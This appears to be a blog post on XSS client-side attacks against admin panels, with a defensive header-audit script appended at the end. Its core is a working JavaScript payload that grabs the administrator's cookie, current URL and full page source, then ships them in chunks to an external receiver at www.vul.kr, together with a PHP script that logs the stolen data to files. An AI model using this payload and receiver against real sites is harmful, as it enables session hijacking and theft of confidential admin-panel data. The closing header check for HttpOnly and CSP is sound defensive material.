XSS Client-Attack
1. During a penetration test, the admin panel cannot be found?
2. Confidential information was stolen even though nobody else logged in?
3. The password is extremely complex, yet the login records show logins from a non-administrator IP?
This article discusses the XSS Client-Attack issues behind the three situations above. Specifically:
1. When the admin panel has XSS, the XSS payload can send the administrator's current page URL to the receiving end, using location.href.
2. When the admin panel has XSS, although IE limits the length of a GET submission, the XSS payload can submit the page's source code to the receiving end in several pieces, using AJAX and document.documentElement.outerHTML.
3. When the admin panel has XSS, the XSS payload sends the administrator's session cookie to the receiving end; if the back end does not verify the session strictly, the attacker can then access the admin panel directly, using document.cookie.
Here we focus on point 2. An attacker can already obtain the HTML source with document.documentElement.outerHTML, so why does he also need AJAX? The reason is that not all of the source code can be obtained through document.documentElement.outerHTML.
Example 1:
admin-1.html
This is the source code:
```html
<script>
alert(document.documentElement.outerHTML)
</script>
how about this?
```
We find that the alert window does not contain "how about this?". This means that the content inserted after the XSS code cannot be obtained, because the script runs before the parser has reached the rest of the document; therefore the attacker needs AJAX to get the full source code.
In addition, there is the case where the page the victim opens is stored locally, for example C:\Users\Administrator\Desktop\data.htm. In that case the attacker uses document.documentElement.outerHTML to obtain the source code (the code below checks for a file: URL to decide).
See the following source code:
```javascript
// Ship one chunk of data to the receiving end by loading it as a script URL.
function sd(doc){
send = document.createElement('script');
send.src=server+'get.php?'+doc;
send.type='javascript';
head.appendChild(send);
}
// Synchronous GET of the current page, so the full source (not just the part
// parsed before the script ran) is returned.
function ajax(u) {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest;
} catch (e) {
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
xmlHttp.open("GET",u,false);
xmlHttp.send(null);
return escape(xmlHttp.responseText);
}
var doc='';
var server='http://www.vul.kr/';
var head=document.getElementsByTagName('head').item(0);
url=encodeURIComponent(location.href);
ck=encodeURIComponent(document.cookie);
// Stage 1: current URL and cookie.
sd("s=1&u="+url+"&c="+ck);
// Locally opened file: fall back to outerHTML; otherwise fetch the page over AJAX.
if(location.href.indexOf("file:")==-1)
doc=ajax(location.href);
else
doc=escape(document.documentElement.outerHTML);
// Stage 2: the source code, split into pieces that fit a GET request.
doclen=doc.length;
buflen=2040;
for(i=0;i<doclen;i=i+buflen){
dstr=doc.substr(i,buflen);
sd("s=2&d="+dstr);
}
// Stage 3: end marker.
sd("s=3");
```
The receiving end:
```php
<?
$url=0;$data=0;$cookie=0;$addr=0;
$url=$_GET['u'];
if(strlen($_GET['c'])>2)$cookie=$_GET['c'];
if(strlen($_GET['d'])>2)$data=$_GET['d'];
if(strlen($_SERVER['REMOTE_ADDR'])>2)$addr=$_SERVER['REMOTE_ADDR'];
$str="<center><textarea name='textarea' cols=150 rows=30>";
$str.="\r\n\r\nURL:".$url."\r\nCookie:".$cookie."\r\nAddress:".$addr."\r\nTime:".date("Y-m-d h:i:s", time())."\r\n\r\n\r\n";
if($_GET['s']==1)w($str);
if($_GET['s']==2)w(htmlentities($data));
if($_GET['s']==3)w("</textarea></center>");
function w($d){
$a=$_SERVER['REMOTE_ADDR'];
@fwrite(@fopen("dc/".$a.".htm","a+"),stripcslashes($d));
}
?>
```
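As an added, defender-side example (not part of the original article, and not the article author's code): a small Node.js check that audits the response headers which decide whether the three attacks above succeed. A session cookie without HttpOnly is what makes point 3's document.cookie read work, and a missing or permissive Content-Security-Policy is what lets the injected inline payload run at all and lets the script element created in sd() load from an external server. The function names and the sample header values are assumptions constructed for this example.

```javascript
// Added example, not from the original article: audit HTTP response headers
// for the settings that decide whether an XSS payload like the one above
// can read the session cookie and ship data to an external receiving end.
// All sample header values below are constructed for illustration.

// Parse one Set-Cookie header into its name and a lowercase set of attribute names.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const name = parts[0].split('=')[0].trim();
  const attrs = new Set(parts.slice(1).map((p) => p.split('=')[0].trim().toLowerCase()));
  return { name, attrs };
}

// Parse a Content-Security-Policy header into { directiveName: [sources...] }.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// True if a source list lets the page load scripts from an arbitrary host:
// an absent directive, a wildcard, a bare scheme, or any explicit remote origin.
function allowsRemoteScripts(sources) {
  if (!sources) return true;
  return sources.some(
    (s) => s === '*' || /^https?:$/i.test(s) || /^https?:\/\//i.test(s)
  );
}

// headers: object with lowercase header names; 'set-cookie' is an array.
// Returns a list of findings; an empty list means the checked settings are sound.
function auditHeaders(headers) {
  const findings = [];
  for (const raw of headers['set-cookie'] || []) {
    const cookie = parseSetCookie(raw);
    if (!cookie.attrs.has('httponly')) {
      findings.push(`cookie ${cookie.name}: missing HttpOnly, readable via document.cookie`);
    }
    if (!cookie.attrs.has('secure')) {
      findings.push(`cookie ${cookie.name}: missing Secure, sent over plain HTTP`);
    }
  }
  const cspRaw = headers['content-security-policy'];
  if (!cspRaw) {
    findings.push('no Content-Security-Policy: inline and remote scripts are unrestricted');
  } else {
    const csp = parseCsp(cspRaw);
    const scriptSrc = csp['script-src'] || csp['default-src'];
    if (allowsRemoteScripts(scriptSrc)) {
      findings.push('script-src allows remote hosts: an injected <script src> can reach an external server');
    }
    if ((scriptSrc || []).includes("'unsafe-inline'")) {
      findings.push("script-src allows 'unsafe-inline': an injected inline script runs");
    }
  }
  return findings;
}

// Constructed samples: a weak admin-panel response and a hardened one.
const WEAK_HEADERS = {
  'set-cookie': ['PHPSESSID=abc123; Path=/'],
};
const HARDENED_HEADERS = {
  'set-cookie': ['PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'],
  'content-security-policy': "default-src 'self'; script-src 'self'; connect-src 'self'",
};

console.log('weak:', auditHeaders(WEAK_HEADERS));       // three findings
console.log('hardened:', auditHeaders(HARDENED_HEADERS)); // []
```

The check deliberately treats a bare scheme such as `https:` as permissive, because it allows a script element with any remote src, which is exactly the channel sd() uses. Note that CSP does not stop the same-origin AJAX read of the page itself; it only removes the inline foothold and the external delivery path, so the HttpOnly flag and strict server-side session verification remain necessary for point 3.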
I just want to say that your blog is full of interesting articles, keep us posting